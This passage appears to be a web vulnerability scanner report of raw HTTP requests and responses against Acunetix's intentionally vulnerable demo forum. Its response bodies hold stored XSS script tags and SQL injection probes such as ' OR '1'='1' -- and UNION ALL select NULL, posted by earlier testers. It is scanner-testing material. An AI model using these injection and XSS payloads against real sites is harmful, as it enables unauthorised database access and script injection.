class='threadtitle'><a href='showthread.asp?id=4'><script>alert('Hello')</script></a></div></td><td>1</td><td> </td><td>3/13/2022 3:34:05 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=5'><script>alert('BELLO')</script></a></div></td><td>1</td><td> </td><td>3/13/2022 3:34:42 PM</td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;left:10%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=0 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 178 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:25 GMT Content-Length: 14602 |
| Response Body - size: 14,602 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=1 -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='1' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="1" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> OR 1=1 -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2 -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' OR '1'='1' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='2' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" OR "1"="1" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="2" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> OR 1=1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' OR '1'='1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='2</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" OR "1"="1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="2</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>) UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>') UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>") UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> ASC -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:13:44 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>o3lppoLN</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 12:05:24 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Call me maybe<script>alert('Beautiful in white)</script> - 202.187.185.168</div><div class='posttext'>HI Maybe<br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 12:06:11 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Call me maybe<script>alert('Beautiful in white')</script> - 202.187.185.168</div><div class='posttext'>HI Maybe<br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 12:51:58 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1 <script>alert('Hello')</script> - 180.75.245.68</div><div class='posttext'>HELLO<br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>hanxuan</b> on 3/13/2022 2:43:15 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>hi - 180.75.236.90</div><div class='posttext'>http://example.com/han.js<br />document.write("I'm coming");</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=1 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:25 GMT Content-Length: 5979 |
| Response Body - size: 5,979 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:12:27 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1 - 180.74.64.218</div><div class='posttext'><script>alert('Hello')</script><br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:12:55 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1 - 180.74.64.218</div><div class='posttext'>Message 1<script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:08 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>111 - 180.74.64.218</div><div class='posttext'>Message 1<script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:31 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>123 - 180.74.64.218</div><div class='posttext'><script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:41 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>123 - 180.74.64.218</div><div class='posttext'><script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:51 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1<script>alert('Hello')</script> - 180.74.64.218</div><div class='posttext'>1232</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=10 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4130 |
| Response Body - size: 4,130 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%" -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=11 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4134 |
| Response Body - size: 4,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> OR 1=1 -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> 